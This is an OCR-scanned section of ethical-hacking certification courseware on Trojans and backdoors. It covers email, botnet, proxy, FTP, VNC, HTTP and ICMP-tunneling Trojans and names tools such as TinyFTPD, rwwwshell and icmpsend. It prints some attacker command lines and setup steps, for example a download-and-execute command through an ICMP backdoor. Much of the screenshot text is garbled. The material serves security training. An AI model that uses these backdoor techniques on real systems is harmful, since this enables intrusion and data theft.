Email Trojans spread through bulk emails. Trojan viruses are sent through attachments. The moment the user opens the email, the virus enters the system and spreads and causes a lot of damage to the data in the system. It is always recommended that users not open emails from unknown users. Sometimes email Trojans may even generate automatic mail and send it to all the contacts present in the victim's address book. Thus, it is spread through the contact list of the infected victim. Attackers send instructions to the victim through email. When the victim opens the email, the instructions will be executed automatically. Thus, attackers can retrieve files or folders by sending commands through email. The following figure explains how an attack can be performed using email Trojans.

Module 06 Page 876

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Instructions a r • se n t to th e victim through em ails Send m e : \araditcard. txt file a n d launch calc.exe

Any com m ands for m e? H ere is th e re q u e ste d file

Jp ? Email

j!

; C dk.exe j e x ec u te d

I ‫*יין‬

* y rl•
Attacker Internet Firewall Victim

FIGURE 6.15: Illustrating the attack process using email Trojans

Module 06 Page 877

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

E -m ail Trojans: R em oteB yM ail

C EH

C «ds e M e cU e d 0
Ertvai: :«n r

0
POP patswad SMTP Mfv«r 10/tjeAa oxn
Aulherticaton|Sanew POP j] Avaijfate wrnnand

Next eavjrf check 000900 Nov* ctociung

last itspow
$t«t• No co«*tt ton
lo ‫־‬ .« ea a

Piogrmt

SMTPuter SMTP pa«wad
p * t * < x l ...... __

SoltPwfe (»c«pod*0tolip#<*• canl

• > ‫־‬ < » s » n p » e c Q n »

u M n V o * * [* • * • * * 0 0 ‫״‬ ‫׳‬ r d* m> w »• ‫ י‬y uteri _____ ‫״‬0!.‫• ״‬ mai»* » «* ‫יי ״ ״‬ 6 ‫י״׳‬

----‫״‬ _

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

EAm I I Uail A A T A Arojans: \ S JV & A L 1 9 ■ A RV em V I I I VoteB / I V A / yM Jf A f iail a iiU
RemoteByMail is used to control and access a computer, irrespective of its location, simply by sending email. With simple commands sent by email to a computer at work or at home, it can perform the following tasks: 0 0 0 Retrieves list of files and folders easily Zips files automatically that are to be transferred Helps to execute programs, batch files, or opens files

This is an easier way to access files or to execute programs on a computer remotely. The main screen displays information that the program has received and processed: 0 Start Server: Click the Start Server icon for RemoteByMail to begin the process and receive email Stop: Click the Stop icon to stop the application at any time Check now: Checks for next scheduled email Statistics: Displays program information Listening to Accounts: Displays accounts and associated email addresses

0 0 0 0

Module 06 Page 878

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

0 0 0 0

Emails received: Displays email list containing commands the program has received Command queue: Displays commands the program has received but not yet processed Outgoing emails: Checks for processing email Emails send: Displays list of email sent by RemoteByMail

RemoteByMail accepts and executes the following commands: 0 0 0 HI: Used to send email with the content "Hi" to your email address SEND: Sends files located on the host computer to your email address ZEND: Zips and then sends files or folders located on the host computer to your email address. To open a Zip attachment after you receive, enter the password you chose when you created the account EXECUTE: Executes programs or batch files on the host's computer DIR: Sends the directory of a drive or folder to your email address

0 0

N» Accor• T o o •

© U jf>
3 Cm* im oM 0 E«m* mr* 0 Nerf«ooicr«d »C9CC Hw c.'Kirg

^ 0 .0 D*•

ficm

C#•

> o >

POP tm!■wig SMTP Mfvw IwHpwhcqn

9
w A »< hen*c«hoajSame« POP 3 I I

LMWtr Om To ‫•ז‬ SMTP‫*״‬ SMTP9$mm*

C1«MaM*ct«gM ifim

J

itf t

{* o J& ty a M ttC i• '* • *
‫•יייי‬

nv.'/.'xn
w n /sm r m

‫ «**־‬:fw'tng m k«I , v«« r

f*.0« ‫־‬ *

u+nnt* (,*mac**

✓0* I

X iw !

7 b* |

FIGURE 6.16: RemoteByMail screenshots

Module 06 Page 879

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

D e f a c e m e n t T roj a n s

CEH

D efacem ent Trojans
Defacement Trojans, once spread over the system, can destroy or change the entire content present in the database. This defacement Trojan is more dangerous when attackers target websites; they physically change the entire HTML format, resulting in the changes of content of the website, and even more loss occurs when this defacement targets e-business activities. It allows you to view and edit almost any aspect of a compiled Windows program, from the menus to the dialog boxes to the icons and beyond. Resource editors allow you to view, edit, extract, and replace strings, bitmaps, logos, and icons from any Windows program. They apply target-styled Custom Applications (UCAs) to deface Windows applications. Example of calc.exe defaced:

Module 06 Page 880

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

You Are Hacked! I !!!

View

Help

~~0.

Defaced calc.exe

E Calculator

1
You AieHeckedtlll! View heto

IZ]
|6 acfctfrace| | C E |[ ~ C

I
Ib k * 1 m < «|i ce ‫ן ך‬ c ‫ן‬

0
0

0

q

it

‫׳הכו‬ z ip ■ 7 ]

0
1 E

‫ר^ורחה־ו וז־וה־ו‬
‫ וי״‬1 ‫ ׳‬i i ; . [ ‫>׳‬ ] jn-j ‫ה־וה־־וו ו ה ח ה־ו‬

0 ‫ש‬0‫םש‬0
0 0 0 □□ □

‫ה ח ר־ו ה ח ה ח ה ח‬

FIGURE 6.16: An example of calc.exe defaced

Module 06 Page 881

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

D efacem ent Trojans: Restorator
Source: http://www.bome.com Restorator is a versatile skin editor for any Win32 programs. The tool can modify the target interface of any Windows 32-bit program and thus create target-styled Custom Applications (UCAs). You can view, extract, add, remove, and change images, icons, text, dialogs, sounds, videos, version, dialogs, and menus in almost all programs. Technically speaking, it allows you to edit the resources in many file types, for example .ocx (Active X), .scr (Screen Saver), and others. The attacker can distribute modifications in a small, self-executing file. It is a standalone program that redoes the modifications made to a program. Its Grab function allows you to retrieve resources from files on a target's disk. Restorator is the Borne flagship product that allows you to do resource (resources are application-dependent data that the respective programmer includes in the program) editing. It is a utility for editing Windows resources in applications and their components, e.g., files with .exe, .dll, .res, .rc, and .dcr extensions. You can use this for translation/localization, customization, design improvement, and development. This resource editor comes with an intuitive target-interface. You can replace logos and can control resource files in the software development process. It can intrude into the target's system and its working programs.

Module 06 Page 882

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

storator 2007 Trial - C:\Software\Softpedia.exe
File Resources Viewer Edit Tools Help Res Viewer H B * •3• 1

‫ ם‬a-aaoo,
Resouice Tree a ]§) Softpedia.exe S String S O Q IS 2 Neutr< RCData □ 1 1111 Icon □ MAIN I

mmmm
Saving Delphi/C++ Builder Forms Codepage Shell Integration Viewer Text Editor File Browser RC Files Advanced 1*1 Show TooKips [default] 0 Allow multiple Restorator instances 0 Show splash screen on start ‫ ח‬Keep Restorator Window always on top 0 Ask for Folder, when assigning/extracting all [default] Number of recently used files in file menu: Number 0 1 recently found files in file menu: 10 ^ 20

Q 1C) Version

□ 1
B t j Manifest

1 ‫ □־־‬1

<L

2>
0K

String\4089\Neutral

19 20 21 22 23 String

65426 65427 65428 65429 65430

Integer overflow Invalid floating point operation Floating point division b y zero Floating point overflow Floatina point underflow
1 open file

FIGURE 6.17: Restorator Screenshot

Module 06 Page 883

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

B o tn e t T r o ja n s
0
J Botnet Trojans infect a large number of computers across a large geographical area to create a network of bots that is controlled through a Command and Control (C&C) center Botnet is used to launch various attacks on a victim including denial-of-service attacks, spamming, click fraud, and the theft of financial information

CEH
0

J
,0

0 .

Website

Botnet Server
Copyright © by EG-GlDDCil. All Rights Reserved. Reproduction is Strictly Prohibited.

Cl

Botnet T rojans

--- A botnet is a collection of software robots (worms, Trojan horses, and backdoors) that run automatically. It refers to a collection of compromised machines running programs under a common command and control infrastructure. A botnet's originator (attacker) can control the group remotely. These are computers (a group of zombie computers) infected by worms or Trojans and taken over surreptitiously by attackers and brought into networks to send spam, more viruses, or launch denial of service attacks. This is a computer that has been infected and taken over by an attacker by using a virus/Trojan/malware. Botnet owners usually target educational, government, military, and other networks. With the help of botnets, attacks like denial of service, creation or misuse of SMTP mails, click fraud, theft of application serial numbers, login IDs, credit card numbers, etc. are performed.

Module 06 Page 884

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Botnet C&C Server
FIGURE 6.18: Illustrating the process of infecting company's website using Botnet Trojans

It has two main components: 0 0 Botnet Botmaster

They target both businesses as well as individual systems to steal valuable information. There are four botnet topologies. 0 0 0 0 Hierarchal Multi Server Star Random (Mesh)

Module 06 Page 885

Ethical Hacking and Countermeasures Copyright © by EC-COUIICil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Botnet Trojan: Illu sio n Bot and NetBot Attacker

‫״‬pdM* cre M B O T B N O T irO 1

Reload

1 1

H o • * ’( U

0 1

Pat f\*

2j ho* 1aaa1 IJH o tf

6 5 6 7 6 6 6 7

C h a r ttc tv s n
Chan #ch*n P*»:

*e*

2 1
Dd«J m nxn

P o » t
Safci .pat Sock oat R R R ‫ ״׳י‬Random tanpe Bindttwi. port 2001

4 * :5
HP. PC*

RCAocim

‫א‬ ‫ זג‬ixccvcro
*
CdrcMicc
*‫ ״‬° OP * W a r IRC charrel

MD5 C«ypt

,/ |Rr ,‫״‬

‫! י — * ״‬.*.■*, 1 “ ‫•״‬MW

O yM JSXPSP2
FbtdVduw

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

Botnet Trojan: Illu sio n Bot a n d NetBot A ttack er
Illusion Bot is a clear GUI tool for configuration. When this bot starts, it checks the OS version and if it detects Win98, it calls the Register Service Process API to hide the process from the Task Manager. The bot then proceeds to install the rootkit component. If the installation fails, the bot tries to inject its code inside the explorer.exe process. Illusion Bot is a GUI tool. Features: 0 0 0 0 0 0 0 0 0 C&C can be managed over IRC and HTTP Proxy functionality (Socks4, Socks5) FTP service MD5 support for passwords Rootkit Code injection Colored IRC messages XP SP2 Firewall bypass DDOS capabilities

Module 06 Page 886

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

NetBot Attacker provides a simple Windows Ul for controlling a botnet, reporting and managing the network, and commanding attacks. It installs in to the systemin a very simple way such as RAR file with two pieces: an INI file (see the following, partially editedand obscured) and a simple EXE. The original NetBot Attacker is a backdoor; thistool retainsthat capability and lets you update the bot and be a part of the rest of the botnet.

9 Br^ry C \Doajmem and 5«tngs\Wmu»'Pa«5c^ cio/ABOT6INARY E> ‫־‬ t — 1| Hot* 10001 2 1 Horf 10001 W E B A<*nrct140n 1| Most 2 1 Host r * * j » m m c« Socfc*4. p o t♦ * $ock»5. pott FTP 00< IRC Acc*1 t BOT PASSWORD O0km * lot‫ •*׳‬t et‫*׳‬N D 1»v#t S*v# ‫ •*•*ז‬n ipgn'if < *‫־‬ *ny MDSDypt R R R « ‫ ׳‬Random larnj? Bndshel port 2001 ■ 3000 R Port Port Paih Path Felteshlfw sec i Poll 6667 Poll 6667 Chan BeHsn Chon Uchan Pats 4*$r Paw Retoad

IRCAdnrabtfion

1
0 1 >Jme hosts flltac* Atea Collective order Ute 1 1

+ A140 0P admn onlRC ehannri + Irpct cod• |rf dnvat fWc| «‫ ״‬Add to autoload ‫ם‬ Ext | Sava

* IRC tmvH *

paiwwtd

Bypat tX PSP 2 F « **al FbodV^jat

+ CotocdRC nreuages

About

FIGURE 6.18: Illusion Bot and NetBot Attacker Screenshots

Module 06 Page 887

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

P ro x y S e r v e r T ro ja n s
P ro x y T ro ja n

,a n

W

Trojan Proxy is usually a standalone application that allows remote attackers to use the victim's computer as . a proxy to connect to the Internet

Proxy server Trojan, when infected, starts a hidden proxy server on the victim's computer

Hidden S erve r

Infection

Thousands of machines on the Internet are infected with proxy servers using this technique

| p •aS ©‫ ־‬1 ® ‫'׳‬i
Attacker Victim (Proxied) Internet
Target company

P ro ce ss

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

Proxy Server T ro jan s
A proxy server Trojan is a type of Trojan that customizes the target's system to act as a proxy server. A proxy server Trojan, when infected, starts a hidden proxy server on the victim's computer. The attacker can use this to carry out any illegal activities such as credit card fraud, identity theft, and can even launch malicious attacks against other networks. This can communicate to other proxy servers and can also send an email that contains the related information.

4 ! P ‫׳־‬ ■ ‫׳‬ ‫׳‬
Attacker Victim (Proxied) Internet
Target Company
FIGURE 6.19: Attacker infecting Target company's system using Proxy Server Trojans

Module 06 Page 888

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Proxy Server Trojan: W3bPrOxy Tr0j4nCr34t0r (Funny Name)

J

W3bPr0xy Tr0j4n is a proxy server Trojan which support multi connection from many clients and report IP and ports to mail of the Trojan owner

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

Proxy Server Trojan: W 3bPrO xy Tr0j4nCr34t0r (Funny N am e)
W3bPrOxy Tr0j4nCr34t0r is a proxy server Trojan developed in order to access systems remotely. It supports multi-connections from many clients and reports IP and ports to the email of the Trojan owner.

Module 06 Page 889

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

ZHTectm
few f V o S f •
W ekom c to W3bPr0xy TrOHn Cr34IOr V .1 . D

Listening Ports [Separate ports with a slm icolon (;)] 10;Zl;Z2;80;81;135;l36;«lM12;666;H33;1434;2012|

%[Mndows system]

FIGURE 6.20: W3bPrOxy Tr0j4nCr34t0r detecting IP address

Module 06 Page 890

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

FTP Trojans
Send me \ c r e d it c a r d . t x t file

CEH
(FTP Server installed in the background)
06/02/2012 09/06/2012 08/24/2012 05/21/2012 05/21/2012 06/04/2012 08/11/2012 1,024 rod 0 abc.tzt <0IR> AdventHet 0 AUTOEXEC .BAT 0 COBFIG.SYS <0Ht> Data <0IR> Documents

Here is the requested file

Victim

FTP T ro jan : TinyFTPD
FTP Trojans install an FTP server on the victim's machine, which opens FTP ports An attacker can then connect to the victim's machine using FTP port to download any files that exist on the victim's computer £53 Command Prompt
C : \ D o c w e n t s a n d S e t tings \AtM 1 n\Desktop\TinyFTPD 21 55555 test test c:\ w i n 98 all RHLCD Tiny FTPD VI. 4 By WinKggDrop FTP Server Is Started ControlPort: 21 BindPort: 55555 UserNaae: test Password: test B a a e D ir: c:\win96 A l l o v d IP: all Local Address: 192.168.168.16 ReadAccess: Yes WnteAccess: Yes LIs t A c c e s s : Yes CreateAccess: Yes Delet e A c c e s s : Yes Execut e A c c e s s : Yes No UklodcAcoess: No AnonyaousAccess Check Tise Oat Thread Created Successfully *************** 0 Connection Is In Use

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

FTP T ro jans
An FTP Trojan is a type of Trojan that is designed to open port 21 and make the target's system accessible to the attacker. It Installs an FTP server on the target's machine, allowing the attacker to gain access to sensitive data and download/upload files/programs through the FTP Protocol. Further, it also installs malware on the targets system. Credit card information, confidential data, email addresses, and password attacks can also be employed where only the attacker gains access to the system.

(ft
Hacker

Send me c : \ c r e d i t c a r d . t x t file

FTP Server
(FTP Server installed in the background)
V u lu n c I n d r i v e C h a s no l a b e l . Vo 1 u n e S e r i a l N u n b e r i s D45E-9FRE D i r e c t o r y o f C : \ 0 6 /0 2 /2 0 1 2 1 ,0 2 4 - r n d 0 9 / 0 6 /2 0 1 2 0 a b c . t x t 08/24/2012 <D1K> AdventNet 0 5 / 2 1 /2 0 1 2 0 AUTOEXEC.BAT 0 5 / 2 1 /2 0 1 2 0 CONFIG.SYS 0 6 /0 4 /2 0 1 2 <DIR> D a t a 0 8 / 1 1 /2 0 1 2 <DIR> D o c u m e n ts a n d

95V*•

Here is the requested file

Victim
FIGURE 6.21: Attacker infecting victim's system using FTP Trojans

Module 06 Page 891

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

FTP T rojan: TinyFTPD

Command Prompt
C:\Documents and Settings\Admin\Desktop\TinyFTPD 21 55555 test test c:\ win98 all RWLCD Tiny FTPD VI.4 By WinEggDrop FTP Server Is Started ControlPort: 21 BindPort: 55555 UserName: test Password: test HomeDir: c:\win98 Allowd IP: all Local Address: 192.168.168.16 ReadAccess: Yes WriteAccess: Yes LIstAccess: Yes CreateAccess: Yes DeleteAccess: Yes ExecuteAccess: Yes UnlockAccess: No AnonymousAccess: No Check Time Out Thread Created Successfully *************** waiting For New Connection 0 Connection Is In Use

FIGURE 6.22: TinyFTPD Screenshot

Module 06 Page 892

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

VNC Trojans
VNC Trojan starts a VNC Server daemon in the infected system

CEH

It connects to the victim using any VNC viewer with the password "secret‫״‬

i

Since VNC program is considered a utility, this Trojan will never be detected by anti virus

Command and control instruction

f t
Attacker Victim VNC Server

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

VNC T ro jans
VNC Trojans allow attackers to use the target's computer as a VNC server. These Trojans won't be detected by antiviruses after they are run, because VNC Server is considered a utility. Performs the following functions when it infects the system: 0 0 Starts VNC Server daemon in the background when infected Connects to the target using any VNC viewer with the password "secret"

Command and control Instruction

VNC Traffic

Attacker

Victim

VNC Server

FIGURE 6.23: Attacker uses victim's computer as VNC server using VNC Trojans

Module 06 Page 893

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

VNC Trojans: WinVNC and VNC Stealer
WinVNC
WinVNC: Current User Properties
Incoming Connections f? Accept Socket Connections Display Number [~ Password:

im ttiM

- _‫״‬ |

Itk.ul IUcIm

VNC S te ale r
E M
OK Cancel Apply

®

I? Auto

O S
Ftp • Settin gs Host:

r* Accept CORBA Connect.':.'!
r r Disable Remote Keyboard & Pointer Disable Local Keyboard & Porte*

Update Handing l~ Poll Ful Screen f? Pol Foreground Window F Pol Wrtdow Under Cusor T Pol Consoie Windows Only ^

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

‫ ־‬VNC T rojans: WinVNC a n d VNC S tealer
WinVNC and VNC Stealer are two VNC Trojans.

WinVNC
WinVNC is used for a remote view or to control a Windows machine so this becomes a threat as attackers are able to inject a Trojan into the system and then they are able to access the target's system remotely.

VNC S tealer
VNC Stealer is a Trojan written in Visual Basic. VNC.EXE has been used to perform the following behavior: Q The process is packed and/or encrypted using a software packing process Q Creates system tray pop-ups, messages, errors, and security warnings

Q Adds products to the system registry 9 9 0 Writes to another Process's Virtual Memory (process hijacking) Executes a process Creates new folders on the system
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

Module 06 Page 894

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

9 9

This process deletes other processes from a disk The process hooks code into all running processes, which could allow it to take control of the system or record keyboard input, mouse activity, and screen contents Registers a Dynamic Link Library File

W inVNC
WinVNC: Current User Properties
Incoming Connections !7 Accept Socket Connections Display Number: [~ Password: P Accept C0R8A Connector!: Cancel OK

VN C S te a le r

Apply

r~
T

Disable Remo»e Keyboard I Pointer Disable Local Keyboard i Ponte*

Update Handkng r Pol Ful Screen

n
T

Pol Console Windows Only R ^ C w J O rtv

(7 Pol Foreground Window 1 “ PdW ndow Under Cusor

FIGURE 6.23: Screenshots showing WinVNC and VNC Stealer

Module 06 Page 895

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

H T T P /H T T P S T r o ja n s

CEH

The child program appears to be a user to HTTP Trojans can bypass any firewall and work in the reverse way of a straight HTTP tunnel

Spawn

the firewall so it is allowed to access the Internet

W
/

They are executed on the

internal host and spawn a child at a

predetermined time

^

HTTP request to download a file

Trojan passes through

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

HTTP/HTTPS T rojan s
HTTP/HTTPS Trojans can bypass any firewall, and work in the reverse way of a straight HTTP tunnel. They use web-based interfaces and port 80. These Trojans are executed on the internal host and spawn a child every day at a certain time. The child program appears to be a target to the firewall which, in turn, allows it to access the Internet. However, this child program executes a local shell, connects to the web server that the attacker owns on the Internet through a legitimate-looking HTTP request, and sends it a ready signal. The legitimatelooking answer from the attacker's web server is in reality a series of commands that the child can execute on the machine's local shell. All traffic is converted into a Base64-like structure and given as a value for a cgi-string, so the attacker can avoid detection. The following is an example of a connection: Slave: GET/cgi-bin/order? M5mAejTgZdgYOdglOOBqFfVYTgjFLdgxEdblHe7krj HTTP/1.0 Master replies with: gSmAlfbknz The GET of the internal host (SLAVE) is just the command prompt of the shell; the answer is an encoded "Is" command from the attacker on the external server (MASTER). The SLAVE tries to connect daily at a specified time to the MASTER. If needed, the child is spawned because if the shell hangs, the attacker can check and fix it the next day. In case the administrator sees connections to the attacker's server and connects it to himself, the administrator just sees a

Module 06 Page 896

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

broken web server because there is a token (password) in the encoded cgi GET request. W W W proxies (e.g., squid, a full-featured web proxy cachel) are supported. The program masks its name in the process listing. The programs are reasonably small with the master and slave programs, just 260-lines per file. Usage is easy: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and run ‫״‬rwwwshell.pl" on the MASTER just before it is the time at which the slave tries to connect.

FIGURE 6.24: Victim's system infected with HTTP Trojans

Module 06 Page 897

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

HTTP Trojan: HTTP RAT
Infect the victim's computer with s e r v e r . exe and plant HTTP Trojan The Trojan sends an email with the location of an IP address

Connect to the IP address using a browser to port 80

e »

Displays ads, records personal data/keystrokes Downloads unsolicited files, disables programs/system

© Floods Internet connection, and distributes threats © Tracks browsing activities and hijacks Internet browser 6 Makes fraudulent claims about spyware detection and removal

Copyright © by EG-GMMCil. All Rights Reserved. Reproduction Is Strictly Prohibited.

HTTP Trojan: HTTP RAT
RATs are malicious programs that run invisibly on host PCs and permit an intruder remote access and control. A RAT can provide a back door for administrative control over the target computer. Once the target system is compromised, the attacker can use it to distribute RATs to other vulnerable computers and establish a botnet. The RAT enables administrative control and makes it possible for the attacker to watch all the target's actions using keyloggers or any other spywares. An attacker can also implement credit card fraud, identity theft using confidential information, and can remotely access web cams and video recordings, take screenshots, format drives, and delete, download, and alter files. It can't be detected as it works like genuine programs and it is not easily noticed.

Module 06 Page 898

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

HTTP RAT 0.3 1

r'rXMTTP RAT • bJ iIxk kdoor Webserver
/ b y zOmbie vfl.31
KM x rn lM

Infect the victim's computer with

server. exe and plant HTTP Trojan

<*>

iWngi
& tend noM1c*hon wtfh p •ddrett 10 rnal SMTP t a w 4 serving mat u c4n specrfy t«v«4l s « w t detntfod Mrih .

The Trojan sends an email with the location of an IP address

I B S H S B S S 8 S S 9 ---y o u « m d «tt* 1s (you@mad c an

P cteeFwWA

t»ve»p o rtf8 6

©
w » k o m » 2 HTTP_RAT in fe c te d c o m p u te r >:]

<2>
Victim

Connect to the IP address using a browser to port 80

Generates | using HTTP RAT :

A

server. exe :
«I'yn rw g m tiiM l rti h i■1 »«l m h i. m1 » n n ■ m l

Attacker
FIGURE 6.25: Attacker infecting Victim's system using HTTP RAT

Module 06 Page 899

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Shttpd Trojan - HTTPS (SSL)
0
0
J J SHTTPD is a small HTTP Server that can be embedded inside any program It can be wrapped with a genuine program (game chess . exe), when executed it will turn a computer into an invisible web server

CEH
0

0

Attacker IP: 10.0.0.5:443

Normally Firewall allows you through port 443

Encrypted Traffic

Victim IP: 10.0.0.8:443

Connect to the victim using Web Browser http://10.0.0.5:443

Infect the victim's computer with c h e s s . e x e S h t t p d should be running in the background listening on port 443 (SSL)

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

Shttpd T rojan - HTTPS (SSL)
o -fr-a

Shttpd is a small HTTP server that can easily be embedded inside any program. C++ source code is provided. Even though shttpd is not a Trojan, it can easily be wrapped with a chess.exe file and it can turn a computer into an invisible web server. 0 0 0 Infect the target's computer with chess.exe. Shttpd should be running in the background listening on port 443 (SSL). Connect to the target using a web browser: http://10.0.0.5:443.

Normally Firewall allows

6 Encrypted Traffic
Victim

Attacker

you through port 443

IP: 10.0.0.5:443

IP: 10.0.0.8:443

Connect to the victim using Web Browser

http://10.0.0.5:443

Infect the victim's computer with chess . ex e Shttpd should be running in the background listening on port 443 (SSL)

FIGURE 6.26: Attacker infecting Victim's system using Shttpd Trojan
Module 06 Page 900 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

ICM P T unneling
J Covert channels are m ethods in w hich an attacker can hide th e data in a protocol that is undetectable J They rely on techniques called tunneling, which allow one protocol to be carried o ver another protocol J IC M P tunneling uses IC M P echo-request and reply to carry a payload and stealthily access or control the victim 's machine

47)
V

‫ן‬

ICMP Client
(Command:

ICMP Trojan: icm psend

ICMP Server
(Command:

icmpsend <victim IP>)
&
Command Prompt
Commands are sent using ICMP protocol

icmpsrv -install)
0 ‫ ־‬Command Prompt
C:\Docunwnts and Settilngs\Admlnlstrator.VINDOWS\Desktop\ICMP Backdoor Wln32>kmp

C:\Documents and Sett»>gs\Adm1n1strat0f.VIND0WS\Deskt0p\l CMP Backdoor Win32>1cmp Send 127 0 0 1
—( ICMP-Cmd vl.O b eta, b y g x iso n e ]— - i E-mail: g ^ g r K tf hotmail.wm ] -

—{

ICMP-Cmd vl.O beta, by gxlsone }—

—{

2012/B/151— 2012/»/15 b~ Usage: Icmpsrv -install <to Install sarvtca> kmpsrv -remove <to remove servka> Transmitting FUa - Success I Creating Service - Success I Starting Service _ Pending _ Success I C:\Documents and SettingsVWmln»str«tor.VINOOWS\DesfctopVlCMP Backdoor Win32 -i

U sage: ic m p se n d Rem otelP CtrHC or Qfq to Q uite H/h fo r help 1c1ap-caco>H [h ttp ://127.0.0.1 /hack,exe =a d m in exe] <Downlo3d Files. P arth is Wsystem 32> [psltst] <Lrst th e P ro c ess> [pski■ ID] <Ki■ th e P ro c ess> C om m an d <run th e com m an d >

Cbpyright © by EC-CMICil. All Rights ^gServed. Reproduction is Strictly Prohibited.

ICMP Tunneling
The concept of ICMP tunneling is simple since arbitrary data portion of ICMP_ECHO and ICMP_ECHOREPLY packets is contains a covert channel that can be destroyed due to tunneling. the contents of ICMP_ECHO traffic, making the use of this channel information tunneling in the possible. ICMP_ECHO traffic Network devices do not filter attractive to hackers.

